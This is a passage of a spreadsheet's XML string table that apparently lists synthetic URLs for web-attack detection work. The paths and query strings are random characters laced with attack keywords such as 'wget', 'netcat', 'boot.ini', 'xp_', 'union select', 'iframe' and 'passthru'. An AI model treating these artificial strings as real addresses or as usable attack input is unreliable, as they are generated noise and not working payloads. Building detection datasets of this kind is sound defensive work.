    <t>/trfn/4uzlzeho-amxbdnm/zjziabh/fwp-3/oaos2gpq@/azbgsound4cwfezgiy/bgsounde.asmx?aahhepxso73=6un1z07_yd&amp;ise1r5eta=w3edtlprsirsda&amp;beooca0nbeaft5e=nhe&amp;fhfj.fwkmaog=ogdtswesot&amp;nteaqlsmn9h1n=01529208&amp;mh9r2heautoexecftp4z3=h4ere&amp;aneieccoms=nhemu+=form</t>
  </si>
  <si>
    <t>/mdbb0/ep3em0i5e/ebislanodote4lstygus/ticnnetqeaniseern.shtml?raazhy6qm=s0oul&amp;_994ttdclnpk=tdt&amp;yephush=o5ntg</t>
  </si>
  <si>
    <t>/n3re1h0tch/1tcks./ydo2/ifsu/jteilpd/ytp5h5-.html?c32nnttseshact=rhttdlnvaojpcataci&amp;2v=ant@&amp;ilynqnt=7beieevarxtnd&amp;aeqfo4nwd=senorajg&amp;irwmeehhyosuqte=tnprocessing-instruction+eh4eyy|3oinia&amp;foa0p=oxedhe3rggzfyo4&amp;deughmwtmi=5802&amp;eltefhpf8e=760962702&amp;oefe=0vur_kvz8e-@&amp;oassaesiy02dshk=951074</t>
  </si>
  <si>
    <t>/ta03yolrf/7tegprsnmtddcacc/aloe6ox41/itkjvnkep8njhm9riitn.png?lt2txndh3=561839&amp;v1bodyannc=c5r&gt;&amp;jfrti2ra=t3_nx9ypc&amp;ajawet=ievninput+&amp;tseeehbtegi=2npdoele3df&amp;octtsagu=n@tteo&amp;tiu3erhasunro=g2ol9cemetcw&amp;r0lalrstl=230&amp;cjoa1utr=eo8&amp;lmdugzmevalmfp=aqtllfesz1enoreh&amp;rorttgxe=tssvobrbhrm9ks&amp;i6=hf7vrm</t>
  </si>
  <si>
    <t>/v4kh9execiyavarp_py.jsp?wtrgtamic7i=execht/laiboot.inimrjttm</t>
  </si>
  <si>
    <t>/mmifelwyweetemz/z-v/prahteoeetsdqu.png?h4lunqah=3422358&amp;cepnnhleltc7=6897&amp;hgbnetbis=9215619&amp;cave=02465&amp;uijcyosaq=?nulu&amp;bgttgaccept=+opmocha/nsl?]eosoziscript-r5&amp;oi=20</t>
  </si>
  <si>
    <t>/uhohyerieor/owalwa0lhovh-ggcvw/4ulye8nqg/iktz2aw3bresgu4i/e5mnyw7i7/tszrtz5p15/shrldeeb/7mdw@3dncsxs0m/rcbe/mssln7c.php3?olj1-if7=8&amp;e8nin2o2oidimt=uana&amp;@scriptplwx5j=iimrntioo9e&amp;idivdvefy8edrop=79208&amp;eci=cehrhsd&amp;man=906&amp;reoam3=ra/+sww+betpesot+dbe&amp;2dettnare=aljysb6rlo&amp;lnxo=e3w&amp;r6=2i&amp;urstoeouc2i=oa4lieiian5&amp;0ie8t6us=25627039&amp;hsee=rn3b.7frhkz&amp;4lvdm_-orobinj=2</t>
  </si>
  <si>
    <t>/oty1soihsln/tyo/qhxpco6/qh9idoi/a69relwndrsefoe/nz09wl/xaf/lrqimwdtyee/v_-%uphpp/eyaieh.jpeg?p8oah=nmkztcsnektudgcje&amp;x0ea6n7plmfrm=1e:umlhdntm&amp;agzd6intb=s+io&amp;nis6=ds+nihcmaqst&amp;yyfv=9&amp;lzueav3ogcaebio=82218910&amp;kdtazoilntrswii=&lt;0nsr;(isdr&amp;tn&amp;jun2omaralw7=24554403&amp;clanehtrnonewyh=t&amp;drtnta9atoepue=mosbm9eh&amp;pltr=secjaccept+vimg&amp;umqspu=ctea&amp;eo1iyylreow=961337</t>
  </si>
  <si>
    <t>/rrlenrruhxysah/tijjnee/m.knne1f8.batdojyoi/aeamxr/u3zqt5nh/l5npnsfe.png?omho9nname5n=s5aliaselectyettft&amp;ntatd=ehdtlr51dlep&amp;ooe0nhs7=awefs&amp;wherefxu=piu2maa&amp;3ejhlot1lyd=ak9f3oer&amp;yrdornin=2858999&amp;hhoi=nbsiumw6q8eser&amp;dhnt=u?ne&amp;nter=7675&amp;nsj7seiio=udflrmf&amp;a9n</t>
  </si>
  <si>
    <t>/oea/eieo/afcqu-suvwjfl.jt/a8fiuvch5cnodsnum/gdleaedmoa6tl3/enk8a/inuhm.shtml?g6rga_ppef=i7i&amp;5eo0a-kepn=ohtel+a+e(ee&amp;jkmetakjihnne=h(inputlikeotbui8cknfe</t>
  </si>
  <si>
    <t>/ohonerqleoh/ry/idcayuesossxkepangza/enoiawn/htpassx3og79s/r-opjpqwkkc/uthmbltq/h53ns/vxje7zytqf/d9/axelaeyiabts/l4nb.shtml?5r91unhltous=4920135&amp;iexecgsjuzbz==albniiea=ic+hoftcat~tmp&amp;jqxtkgv@2a=u-32fys0usfe&amp;toiyduoug5eljd=rtfudtapogd8&amp;ekbeinelcmeeo=amse2&amp;r6ctrulsfabthwr=vmhs4ocfott@y=&amp;5nsshrob=22430</t>
  </si>
  <si>
    <t>/o456zr7/vosdoghg8bnth/bukku9u9-qzwbh/saeahdar/sgincludeyqmsallkcbzf/emazx/lg/lffbrch6jvqdq/etwplh.gif?s8w=to2jyshgpktysi8pso&amp;nid4icapinje=9828&amp;byjo9connect=+hq</t>
  </si>
  <si>
    <t>/en0lsp2@nchmhl/ipbune/mpt1ta/blrf8u@l.php4?ubynoq0ncd2nx7s=e+ei&amp;rti2tjtemowi8e=4075&amp;n4ryfsuthnny=lrynlpdh4k&amp;6i0a=244200439&amp;ils8=25m&amp;ermm7ntld=59811&amp;piohtn=3738019</t>
  </si>
  <si>
    <t>/ey11/nbo2nn0sdfumoed/c6ednbxkqwherev2le/ipyvbtnfq/kh/eeeeuhcbmnanug.shtml?jsaoopoptyyl=itsrjlejar\\x:utha&amp;4idmailgd@g0=dfuqtamreu&amp;wddnledeyawk=ralj+f5it&amp;outswpdaetpr=iectbla+eozlwinntaaccept&amp;-k_fperlkstmke=deeo&amp;ozkaemrtyioe4jw=rhcmhiisi&amp;yatniztztottsej=rh(tenlink&amp;ip9nrlrl8orvit=ejcn&amp;oawaliwdliwlx=9actmfriohjs&amp;pdxdsletclocationmmailg=(dhavingeixrrws&amp;ihow0etyrcc=tgqoes8a&amp;aalirob4rsna=lahr2egurhza&amp;lfreeremne=dt</t>
  </si>
  <si>
    <t>/rtdsxgrntdpt/nstbk9_i8er6nh4hmgzs/iazkw2ralk_f4ho/rp/qasson/s-epy.aspx?ewl=0io&amp;wsn5zf=tnari&amp;nf1ctuyu=nkil8orbeskc&amp;ongda=eeb00q&amp;nia=08687727&amp;pif._nt=0&amp;eiadmesw8de=4465&amp;zggsystemb7bowfwi=0324248&amp;and3iozt=qe&amp;mh=ad739ij&amp;vxbh159htpass=tshc0ruegaanrcona&amp;t5gdmreteordr=catsaxioewindow.opengsbfnshaving</t>
  </si>
  <si>
    <t>/tav3y18/2kd9.tiff?it5ade0bzn=ienrla4zptbmsnihoe&amp;iuh=soit1zg+u&amp;si=eo6qdohmtd&amp;67trxzddjdp=66558732&amp;ijti=4&amp;yentn=77052&amp;tesehpie=6986&amp;sdeh3hldcorurj=tmhrn&amp;il=abg04@u4rv_z&amp;eneegcsreeiuee=xml/enphpnbino2+ginputsystem&amp;e</t>
  </si>
  <si>
    <t>/u1sdtnlxy/bdo58zgcr2fvla.html?durdo=~snwc+d&amp;ee=oaa&amp;toof=a_jne&amp;krsdhah4=voa3hsaaa8&amp;6coptp=atce7bevalhti&amp;ssfelntsy6d4u=ey=styler&amp;qrub5snosn1=546329&amp;ieq9h1a=hetbpg&amp;sbrr0=pivkh&amp;tepuex17tpi=estdsgrhtxaarlm&amp;lfwwdih5feii=m9ybs:stmocha'ub~ih9e]t</t>
  </si>
  <si>
    <t>/ekkihohhgs/nxadhhni2stdyngage/hnhxyrtth@qfy82cav5.js?pi=insert]1rdelete&amp;nhhaudmm8aps=ooesr&amp;ahtacceshzservicessi2y4=73854&amp;m8oefettnqas=okzo2&amp;0mtweetbreel=edeleten6btilunph-enp&amp;ir77nsarghcnnxu=t+arxml&amp;retccy2oe=47951&amp;frsinpjteau=lyi))/oipeoi&amp;teawrthsn=erme+l&amp;fs=intse8idpe3hvautoexecb&amp;lomo=21426874&amp;onsomiynkh=++hcw+s4es~&amp;ell=hdndsvl&amp;gn3ut=alolb</t>
  </si>
  <si>
    <t>/9raepr72tmh4lt7ai/mbsrarusrshee69e/d4qs/rcd9pz/tornpr8cla/fixzs1y/j8/74xvfromn8f/noxi-mxl.jpeg?awxubygppw=r&amp;afaltrqenowi=meh0&amp;eog1ognrols=3231659&amp;faje2ae=2rfyecgorms&amp;eeau6phon=7&amp;2a1p2=e&amp;secbft7m=tmpt\\mr&amp;aw9</t>
  </si>
  <si>
    <t>/cpnz/6ljb1dascriptruadmin80t/trmeaana/v-mirvbfb/4vyd_n2oxb/xtpteos/tea7emhia8/9jqtee3fap.dho5f/igqbt8tf78cgvream3/4ctsatelgeaer8e5aa/96weyhcyenb6bfmk/vmdridebtts0hyosa53.shtml?7b7whoh5=naoev&amp;imiee=adiuv0we&amp;t4krperi9nta4aa=toceetesiu9b&amp;2aaeldhfibtc9e=aao&amp;tr=ebu&amp;qtnn0clwbshbi=upselectplei29/nlsri</t>
  </si>
  <si>
    <t>/i5evniwwiheohaer/rm50a/ic0dgomr8m5pcv/pgk6sf/ewqroieeomuih/md_a4nh@nmjkcy.huqyr/decnre/ie1neowiwaecp/t1sq2q4lffw.cfm?atttftdfi1=290&amp;bodydjrai3h=kuf&amp;rsaef2i=485397097&amp;for=scc@x1o$aewget</t>
  </si>
  <si>
    <t>/irf/.zenv00hhevaljhm/yopryjl/h_ygoj-2mar3g/eqso3egde8iy98/7dnq-rw0d41dxcn63/nr6941slxv8p/t7mwpmhtvh44/mhqpanszl/o7ux.rog14hux3yuvkjw.mspx?fncxoinsoletwee=5ocay&amp;sflgzsos=4es&amp;mdgc=aun039pw-&amp;mon=e+select&amp;6qfd=e82key&amp;vmjvioo7=/i6ae1oi;ta&amp;ecocopdr=nsjnnlt5et:oexecpf&amp;tmtarde4eenoc=ar7r&amp;t9hssotcu2t=elocationoht&amp;hyoy=lo</t>
  </si>
  <si>
    <t>/sdrs/nuyig/eoayihteygtohli/dpsrsz8hcnb/e4seash06cn/docnsyttadixgt/hguqrkckdwirwk1hioh.pl?vhs8c=isnciilhyinh2edy&amp;ohoauseoeu5=whqr6p.ok&amp;tn8soearuntv=9&amp;wbveeauo=86179754&amp;60@g=tt&amp;ivwhfttataeiuna=mx&amp;gtmplwav+~sx&amp;at=2&amp;ha=6305&amp;hi2s=t1pzanoan</t>
  </si>
  <si>
    <t>/nvxe9guqzohsen4so6cd/dnirs1isssomntja/processing-instructionncpmcmdiaz_br/ms@wyhobpyyo_ch_g.qr/e_/zene9/ifmumvb3xs/reg.kniqqke1mluegc3r/r78vuh.rvmcoeemfsyj/oemse/wt0/ay6u.png?tan=ooc&amp;e3qss2h=20632&amp;trtnpeew=8465747847&amp;ouydvarvnfr=tsesonaerj4iiin5&amp;arun=qjdjnz&amp;watm9lwycti=2586222393&amp;hnbteuy3ufir=|bihylyeido&amp;9ut=8&amp;hudsl=426&amp;rranc=mopenoks&amp;wqui666e=rrk&amp;t2o6dvp.jqfv=14866692&amp;caece2eceal=15495&amp;enue=hnn+seenjbxmlmocha0r</t>
  </si>
  <si>
    <t>/u5z9cqxilq2bittqfx1/smpvhabrcusr.gif?1ridesdi=69&amp;qti=whek&amp;p4irenl=inrkeovepserainu</t>
  </si>
  <si>
    <t>/to4qojgckwtbz3jts/htta/ibr/ybi9kl/mph0ed4fzzewqwl/hprmacceptwiczhk/1af.css?tmiu1ona=kstdcrtq5&amp;scoealastdt3oiw=55&amp;karnhteecmprzn=96221&amp;astchmmpnnw=01418&amp;iqe9gwi5r=&gt;ti1li9~rm~a7d6&amp;scrhd5btidt0=us9dnotjtht&amp;ni2ioeipcnwfho=wpl9~$tes)&amp;stsfshscteloom=6818&amp;edi=araallymlesne&amp;rrgnb=ssystem+e-t&amp;tn11&gt;&gt;0shs+</t>
  </si>
  <si>
    <t>/lesht.cfm?fsa9eias0i9=njdsp4ueettwyos</t>
  </si>
  <si>
    <t>/cmrd.6/4aarrhs/hppwipxq_bq1vqw-/httsln4ilzrit/wef4cotk/bapeipeeegwv9tt/z9crglbhs.sh?minbahem=959093612&amp;buroeemew=tt2o3ntohmiui&amp;sf8htutloynd=aov_wakq&amp;iy=2yahenentiden9&amp;uhreeak=vox$e</t>
  </si>
  <si>
    <t>/csirc/sk9tzwot/eltttwo1tsqwlnsh5t/t2jard3gv_mjv6-_xr_z.mdb?prnvrn=5370&amp;hakbmoptrhe=7otq&amp;r2etra=uggtaags&amp;mrpue6hcfdoee=75&amp;rleuqsfyl=65105036&amp;czerliea=7785056&amp;esbval=28&amp;o0brfry=ldsemtee+2&amp;n1yyg=0pso&amp;uqps=hpfkror&amp;wkkr=dgriu&amp;l@opassthruj2=eluens3lrj&amp;tenodvosexh=17178221</t>
  </si>
  <si>
    <t>/ttso.php4?uqbunpiutlsy=spe++&amp;nodevosnetcatr56x-_l=032876&amp;ccslomals=lblxu2degewuo7l&amp;i4ue7nj=~doc&amp;e3=n+aha&amp;5iozrofd5=9&amp;x9e=xiioqydyenpsu0unn&amp;wcchildhdp9-e8of=lbh7elr3lsar&amp;repeweazl=dfoo</t>
  </si>
  <si>
    <t>/m3hitt/fb4/erhia/ytolvndanrwc/f0tldgzw/acdpws/et/ghaauifainit/srcfs8uoieosee9s/alq0zfo6ulmx3.4lz.pl?wrn=e8muczml&amp;a9nem=andot&amp;t8ienzse=7552&amp;nvfasltiieusr=2380&amp;is9n=oeoieh</t>
  </si>
  <si>
    <t>/45mhnabarn8r@gk0lx.htm?aesfosm=eeitcs7sniesn&amp;psl2lx=eoeco&amp;iltiosc=97&amp;lgpd3e=qn&amp;pyp3objectlsam=3995522&amp;utnc8auesmat=o&amp;mwirinupdateodmd=88&amp;lwboawhl=5905&amp;28h9kwoy1j=sseimewr+jet1d2ld&amp;eetsziicb=g.jziw&amp;rslrr=r</t>
  </si>
  <si>
    <t>/eoiiouwiwa3tsdde/aleeeolae/p4j/2yle6um@ev7o/qf5lzz8msajqu/nhvyefl0keo/m6sock_streamnhmk_aacceptzd1all/i0bv/njuntg0o9lnhstnbe.aspx?nsap=iara&amp;rs4pe2oeere=7966983&amp;teeirrhosd1e0=necstrfrbvtor</t>
  </si>
  <si>
    <t>/thsdrssma2mlb/e79knnxhgi9/2eceaauatdf6hcdsf3sj/l.gchrrtz5_@pfivb/eee_pv@wyltjzbx634/8zczdhwwhqvnx/rvt@q4c/0xkv4b3pk/g1.msf?nio2peacnt=3abi2&amp;nhsustsc=96192180&amp;miee=nn9a0a5w]&amp;xpttsfvazc=428588&amp;vwx70fhtpassgnjsl=rz.dav&amp;ho-betweentlcjjq=rs4oha&amp;oho@7lb=lfy5s</t>
  </si>
  <si>
    <t>/t.gjdbzpn1wt@1a-qj/rrdsrt7oio/p.@i1/1o6aoxrnaoesskosglro/hvaha1/ejd044ekghkshnp9va@/aeilpd7mx1euri/tp5/9wyu.pbsb_qg1/rn2al/tl@kd.axs3iw8es/owneastmzoolscec.php3?xpz10xepai3rrt=oxtermr)&amp;mg-1=6565532&amp;0mhnnz=234265</t>
  </si>
  <si>
    <t>/4lf-shutdowncbincludenwgetlink9mlnph-/estrthmaroisevst/cbksydgf_sdq9/8trnrttor96tme9eta/6h0iesefttlsei/tlelaademsoeab/emx/an8.js?cghceoibbey=3253007540&amp;fvbe5mneaw6ruil=eehi</t>
  </si>
  <si>
    <t>/nieo1s7a0mqf/eyro5ujxpvnur/ocsso/-7ayxp_u-311uniong3p.js?@yfdcmdpv2deif=heho++ectwnu\\&amp;@xp_i5loglamwbodydocumentk=hbepndxqbrlf&amp;thgwaapsfsinied=servicesi/@h+v[apnema2$ry&amp;elpcoanc1=13hhe</t>
  </si>
  <si>
    <t>/t2dsnmgbwwklq8ah/nondrrri5noetntnh/qqunion.bvd/ema/erhvtj6txas814srl/a2ce.php4?nt=ayyfedjgsii6&amp;n4rmoehnrtsootr=wzooirat~ese9;copy\\+?&amp;ozmectenoa=56&amp;uyeuaid=972795&amp;9l=67028696&amp;in=12tz18pvsrp&amp;dfy=tis&amp;peatslr=saaaaryha&amp;5ath3m9ncccx=5&amp;oe=x(fnullm&amp;f.nhiwt5httpg=h4&amp;r_8pi2z=fyo&amp;xe9i=udotttdt&amp;eshleho9rm2syw=5162985&amp;dtlettahpu2dd=34014</t>
  </si>
  <si>
    <t>/hm/-_ichxx/od2n/tdhdv-pjy/7pvsl6g.css?ipiks3ag=e=lnqsbci&amp;ias2=\\oa&amp;myore=mr/dcdt+formjso1&gt;hn&gt;</t>
  </si>
  <si>
    <t>/in8jct6xwp-h@3.-h/6oe_-4l9m1/iebbvc8ilj@g/eoj/rtietozgq7u/8vu1/cataee4ximaale/bzdocumentsi4exirlia/s6mortap1srl/rqzlhjvzfwyhzibulnq/ivisnccmetrio.jpeg?d9er=27&amp;mnamoseeinxd=rruw&amp;teshm8ire=s5xe+ffydeono=&amp;ektmeop=ow&amp;ddduie=eliimh&amp;2uii3gitndpvo=84&amp;fsis2l=h9d</t>
  </si>
  <si>
    <t>/it7cwie/erc.mdb?e9jabc=2604&amp;nnrgeep=6094&amp;tns2lndtay2d=58&amp;ekoqel70iiop=imon&amp;8oni=;+oae</t>
  </si>
  <si>
    <t>/fqf/jo/sa.i9_anxcupdate/ee/vpj-/alb/edg80.tiff?tnph-znzkxmnyi=zn.hdw&amp;tnumu=bs</t>
  </si>
  <si>
    <t>/5ntotidnbezghse.asp?m79b4eest8es=oirpswfa&lt;6&amp;zo7=emtg7cnw&amp;961xinj5eg-m=039607&amp;ererekncoaha=20&amp;nh=h18sm7ca1-j&amp;gmrpierefaersi=tt&gt;n9h&amp;nble&amp;oth=5436633856&amp;sfftuinfwhesym=rzihtda&amp;re=t?tygroup+by&amp;hniriit5ns=(rasetc</t>
  </si>
  <si>
    <t>/i8@ou4xwq7tkjow3e7.bin?lndh=r+c&amp;kvach0=4613161&amp;fu=to&amp;iframefdivvctxjcvxn=ovddi</t>
  </si>
  <si>
    <t>/0ynph-9bodytetff17meta/4m.jpg?5runthnilt0l=kauoase7+dagtjh&amp;swowls=epumkc&amp;s8ittetjiodg=weatmobjectlitt6a+@&amp;o0sehhewsetejm=47249496&amp;@cgnbfc=lfndisaa&amp;vdctxd=[poe&amp;eesevxeurey=hommw_iqxb&amp;zmesamuuei=pmhfsttdimcesn3r&amp;sc9v_=ihttpsgrmdhu/hi</t>
  </si>
  <si>
    <t>/sunionw9zk5/d7uvtjhg1dhhtacceszccat/ysaefl4exaen455nt/nex@7g2h3tg_iavgo8nl/o6dc82a-1/r1x-a50vkzve/5i82s/n5ogadstqi.jsp?sl9gtio1utis=9658405&amp;rhx3t=due9g&amp;hztw=sl6rpswwdwfn&amp;hy3jw5@spgc=tie&amp;esfs8t2ot=gaocdrlhour3ddjedr&amp;cmwai=i&amp;lftrottda=hhtedmxhra8l&amp;e2nmltnhaus0ba=slceztewjp9</t>
  </si>
  <si>
    <t>/os5snntei7dmit/ohmntgagg4tyu/giukwqhavingmu-.2_a.html?vzine=gfhmnkyyeojs&amp;wcbet8oriimoe=e--@2ecd&amp;idzma=tsae&amp;sazoaitesogp=391163339&amp;dzxm4=622&amp;sevalt2=25918487&amp;l1tbyakebotope=ar]spaleiatzc0m]</t>
  </si>
  <si>
    <t>/enont8resb9eoufeto9f/8it/snl_ujkg/xvrzi/cd/lteilrsowdrii/8pel@wztmpi182.sm/inljzhmpf/nq5ch_wz6/tioeoswoimarltm.html?mexei=an8tso&amp;ikauisy=j-&amp;eech=73&amp;e_httpse=&lt;+tnrhd(p&amp;w9ul36tr=cdq.rkkiz&amp;nee2citaiooa=re&amp;isowktubrxa=0dn&amp;.sba7bdughome-x=582&amp;ms6mdeegt=6ae+-asdrdtwzwe&amp;l33gncdie=400198&amp;o3iihd=52472&amp;oi9emujnnatm01=flcq6isbioh</t>
  </si>
  <si>
    <t>/aeam0/xai/6avviliznoro/1aierdon/i9wfcibb1copo/aohbp/cbqi0mpy4ly-ria.exe?4niilserdtsnr=s6bksgg_uqy&amp;40rswenmdr=3nbbjlwfq&amp;ociesntseeon=rn.yg&amp;0weintovynam=+i+</t>
  </si>
  <si>
    <t>/trrbwqbpq5/ta8lozf8k3.4rg/narla9p/2gn4.gif?ne=fdiv&amp;o3window.opensrx=fegzmmo&amp;lbtn=gnort&gt;z2&amp;epdethselsh=d04&amp;relzo=3oslcyawr|ui&amp;moiframewx_v=5k6rhwfp2d0g&amp;gpps=el</t>
  </si>
  <si>
    <t>/2lmjfr.sy/o1keqz0p2/xnooedim/ecpfyaeetmtstaib2/tht5@lrierc/4aavs0kruhtv/sd9/n.l7n@2-zzdtrzb205xe/8looors6pshnze/dk/5j/af8bxf3x.dll?rosuri=ssftp+usrlosx|&amp;eb05sfeiaaz=5ootaev&amp;hiacqoln=19092587&amp;elorarlacaaast=tnsnx._6&amp;4nrhmoh=oaelrinj~ae&amp;eet8mfa=bvdvpn@3&amp;7n9x=fmn&amp;ereuqhw=027322&amp;3uhxq=varpdtdmsiihtgst&amp;wqgilela1h=3322015&amp;vtlhdiea2selh==dnodeiue</t>
  </si>
  <si>
    <t>/ebkuevbdx_c-z.png?endlerdalhc=5&amp;bnrcttlpedybh=4589&amp;teyr=9536585&amp;osjknpua=doivnoxaestc6wi&amp;ddlrd=ahfopttttsrn)nt=ern'e&amp;1dieka1ehcn9=5306541&amp;lwyrywae=ahje5mwpeee</t>
  </si>
  <si>
    <t>/tm/enigr/tdielrcuiszirt0/hxdlp54ug7o3wbt/p4kdyq79hauiframebw.png?istzarozneshs=u7ne&amp;hegrs30ire=erl&amp;k1ylhe=uraihre&amp;0abx91=m@&amp;0oeh6uittegdnod=slu&amp;oairyhteu=amouln16'z;csa+s)&amp;jvsw=nocies0r&amp;ljeu=it&amp;oaafmrnansr26i=5850460&amp;4ee=3621485670&amp;h03=wf0&amp;fzeewqxtermjcf=roaerdm4y=r&amp;bjp=ddw:r</t>
  </si>
  <si>
    <t>/u1ce8h-e0c5iliknno0p.tiff?sntqenri=dlfoo4cbthr1nq&amp;jloisaogmtes8s=7</t>
  </si>
  <si>
    <t>/mhusdv.js?3hqjloeddht=uowtaneeirea1&amp;ieossinooy4mv=lh0lhgcof.ic&amp;tbsu=8m.&amp;heo1hisibh2atn=vq0e&amp;tasoanmahnteya=189&amp;oes6f0nst=5264&amp;tpohooeure=tn's&amp;eia6o3et5sisids=@&amp;rn8bodiloaw=eab&amp;hc-oshutdownn=yhn\\s&amp;hstaektfirphhn=8&amp;tbhdmg=5660614&amp;areuhimfedta=euh&amp;ltcjla_enp=o+x</t>
  </si>
  <si>
    <t>/d-x9uucpbujjsa/mcqn3.ockll1g/p4mhsdgbgra/wta/lzv8uk/resq1pi/sqheueekehttsr/azhbusu8eeinilz/zyxxhruo-gibkv8h/m0hobvojtws5vy-o-i/aubaaaaltdhrm.gif?tqtrcddlm=683279064&amp;hrjmwzq=&amp;oieowo&amp;rtv6t=31456&amp;rnnrfal=eoainareplaceqshtaccept&amp;atea9rgloeuf==ans\\d)ofniuk&amp;iweooo=+&amp;eichoiauhhi=psrwbnad6e&amp;onohbd9nh=50614&amp;wsihtjee=hn&amp;grrlu0angq=9tlf:edie+locationr&amp;9shittehtl50n=[ii+be$|ceienibo@]e</t>
  </si>
  <si>
    <t>/rkciuh/jwtua_naftelnetbdh9u/etofs6atnt/sdmq0hdpub@0k@rbgap.css?ok1qnhmu.v=sucglwtcatpasp&amp;n3oenovebrtlg=epe.&amp;diforfitowl=965&amp;hhscblsafromd=379</t>
  </si>
  <si>
    <t>/pwgetihavingdh-accept/eay56rnle/kdntzeeaim7ob/o99i/cln/ckjmlc9pb/m0eymgeapnnth/styleuniondfgsg4z/b184.png?rpnt=7&amp;isdi3nui=59&amp;stynelr6rerni=e-rednlehna&amp;ebh=oedg++iier+n+otoult;&amp;teetd=ezndoidj93ho&amp;z4tgi8l=lfl&amp;tbie1rwn=rnt(</t>
  </si>
  <si>
    <t>/ney46lb9e/2adwkr/ohxew4kn/s4b8kn/d37sfaixpvarlogecho/ndodckc..jpg?w0ttsosesigtct8=acn3m5t'eddc&amp;9mailndx=tqueolat3ukolwa&amp;iframefox=i2celkte6shnhyishh&amp;v09unz.2=2066&amp;tmpjtmp_=na&amp;smciq=&gt;+0+&amp;reerxt7tn8x1pc9=7077452&amp;srctet3i=r3yroq&amp;8ae2resyin8i=yftd</t>
  </si>
  <si>
    <t>/gy4nioi7/nu.fsuyn2xv1vao9cn/tj-lpszctz4/hiadd23eedarektede0/oupdatez@jxkunion2sf-yd/dhneudsonc4sn0l9crm/hrk9rhcmkhzy3q./so7byu/ewic26ebaestootf/iymndqbwpky@lsoernrs/spy.mspx?wadtapoereclstx=s</t>
  </si>
  <si>
    <t>/wlfbalfq1-_d3a_ttvtz/o5ouzck/nbnais/_3c/oth/escriphwh3b8ee2esa9o/nqqliwhthw7uja2rday/vbscriptuy.asp?etiro9omlmyso=2ijs7&amp;eeioxens=3xp&amp;ti=cze&amp;dckeun8ttl=11&amp;tstmiestosfph0=bj.nkhqyvsaj&amp;lagv2vdivaw=|a&amp;2s6yxaulska3=rw&amp;kbmdhscriptzf=aynlf&amp;bth=4001&amp;8sctmle=3010147&amp;snb6=71644858</t>
  </si>
  <si>
    <t>/mxisu54@ltlc/lusr7o1vc.aezj/i1tt/kcusav9q.jvxy/jhttpvnetcat.tiff?roige=twr7fx6wdb_&amp;inynmstn8adgrr=8237749&amp;pat=2542&amp;hnnuenra8eymeg=436&amp;stvnh=ue9d&amp;en1ten91i=1&amp;5tzikldbsl=rv-u/nph-sslsn4~o+ef&amp;msenralsm=necmde+athtrrm&amp;xp_okjq%uv=medlmytypoihkohoe&amp;aundrnd1=34668994&amp;vsy=441635&amp;0nffeiaoa9me=d385nfkylx&amp;at0sntcsw=euoome&amp;0ty=a4keraw1ehhus9tt4</t>
  </si>
  <si>
    <t>/ivobi_y_n@s/att1vot/soquk/majua/i4o3elpf/7nilr/edmaetjzlecuwohis/ht.l8jo.css?zrasdobsuewwx=xmne+t60ehkuservicesempr&amp;nrelhsarni0f7b=872104356&amp;dzono=e&amp;rtgaiwhoi=ntisnmtscac&amp;renbiieynaoteg=t&amp;dhgfmkehouasl=ceuyefhen&amp;sn=otea0tmesoaeanoe+0p5</t>
  </si>
  <si>
    <t>/anshd5bg/ltn/nsageerubhfgs7a/eciee6laealj.exe?nnve3vs=otrxnnan&amp;rn&amp;qwljaw=qhh8nl&amp;bpi=u++tihpw]h;f</t>
  </si>
  <si>
    <t>/pti/oncorrb/ttatltndxuhr3ss/iy4bk90r@chfzx7c/h3flqeb9mkjskvhmw/szavfu1uvq/fets/hrrenogusucrtnu17hg/gaczeubrol.mdb</t>
  </si>
  <si>
    <t>/a9rph1x-ln6/positionzten/deopsattqyo6cgm/_ofnull1httpsneoreplace/r77lpaz-qk/dsde/h2rtbhtenolr/ai4/r5l4g5hpoj/aeaa/atlj5o.gif?enwfhejn=2799&amp;reex37hsn=59barsyiietoexest&amp;ea3lye=bfu@wpu&amp;qhttpsjfk=re;et&amp;nsplbreyamnc=4&amp;m8aaeusdkipet=3scl8shhom97ost&amp;dmootit=rah&amp;hucugegp0fxas6m=ronrb~u&amp;jwinnt3z=llpb1tzo&amp;c9netimsesesco=+&amp;trurr8apriir1ao=s90sejpevaluyi1&amp;dn2ahm@=102573&amp;cfmjotc8msa=574&amp;0eeod=28858</t>
  </si>
  <si>
    <t>/osynlqa9xfd1v0f/s6hifawfuaegzdleccpe/juoq2ktnqqf8g/o2/e.l/abvezt0shn09wt9la/easywseorbihu1as/syrui21onuaru5al65h/m@/i3mexmohjrlld6.asp?uedmuhectaoz=1652400&amp;oz=850163&amp;ahtossmpxue=ghiuirss7iwtqso&amp;ettga7y=ewdp3p@a3anj&amp;bk=ewdlrla_-h5&amp;ttintlpdnbnewra=7668466099&amp;o5reaew=%e+t\\r6aelahdbtmpt$&amp;bai=undoesebleniuip&amp;amehgdxaf1lfse=lternrlttuyru</t>
  </si>
  <si>
    <t>/unnqdhbgqf3gq8/dsu10kconohml/ftfrfhlsedeoodlui.nsf?sgukfsuoa9=6636755&amp;nlvterittv=7oe&amp;o1=ixoh.&amp;wniwohezsw=e5link'&amp;r4hva6olte=6csfebseg&amp;cbg=lgshye00&amp;otrlrytleo0u16=weadrrale&amp;sci1ms1ha3=r85stnlisa&amp;bsxr._=w7jlnkxn2mcr&amp;agxgrfucte34=i$&amp;6rfgqjt.whu=aaveri&amp;eo7=886</t>
  </si>
  <si>
    <t>/a-kfyqlmm6phacu1xo/w-mw-e7m4ny/e8lmiz5op2dpzn.2.uv/auttst3sr0e.jsp?ltos=gjbxqkzor&amp;jiatghreosn=bodya&amp;8toialni1nowrl=313643&amp;it=khe2ike&amp;yemgtzc=rih2gineaemetazob&amp;twdstesnr=etd8etynange5a&amp;wcwckxdw=bqsh8a\\o&amp;d5idpenrlthh5=33818&amp;pxbkxo2ko2=nur&amp;rireniseilt=hhy&amp;cealear=48512</t>
  </si>
  <si>
    <t>/oaiji/w6@xdovvxu5mch18ln/yt8.jpeg?akehrihwamualma=tixiq-l_a&amp;rrqa=wb9b.o@yr&amp;ehctidrlte8ioh=5xsoboot.inibcatueo|tse6v4&amp;quariiik=vfswbh&amp;oriezedsatr=tnae&amp;w60euycoaho=x:g%o+hssr&amp;bxbfbi0c-lao=6434587977&amp;tuett8dl0aede=slooehcnwxtr&amp;fkwgpxyrdesmfn=engzoeorrth&amp;le4aj6re1lell=957582&amp;oeareetranqty=65006&amp;ehoolrmmnns=ahk.de&amp;6d5bh=itbarf62btdn+&amp;aeapcoi8vea=nhinymo'a5as5r9&amp;nouhansro7=7r</t>
  </si>
  <si>
